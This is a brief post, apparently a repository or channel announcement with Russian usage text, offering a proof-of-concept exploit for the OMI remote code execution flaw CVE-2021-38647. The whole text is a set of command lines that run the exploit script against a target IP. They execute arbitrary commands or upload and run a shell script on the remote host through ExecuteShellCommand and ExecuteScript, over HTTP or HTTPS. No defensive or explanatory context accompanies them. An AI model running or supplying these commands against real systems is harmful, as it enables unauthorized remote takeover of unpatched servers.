
A PoC exploit for CVE-2021-38647 RCE in OMI
PoC-эксплойт для CVE-2021-38647 RCE в OMI.
Выполнение одной команды с помощью ExecuteShellCommand на стандартном HTTPS-порту:
python cve-2021-38647.py -s 10.10.10.10 shell id
Выполнение одной команды с помощью ExecuteShellCommand на стандартном HTTP-порту:
python cve-2021-38647.py 10.10.10.10 -p 5985 shell id
Выполнение одной команды с помощью ExecuteScript на стандартном HTTPS-порту:
python cve-2021-38647.py -s 10.10.10.10 script -c id
Выполнение скрипта с помощью ExecuteScript на стандартном HTTPS-порту:
python cve-2021-38647.py -s 10.10.10.10 script -f script.sh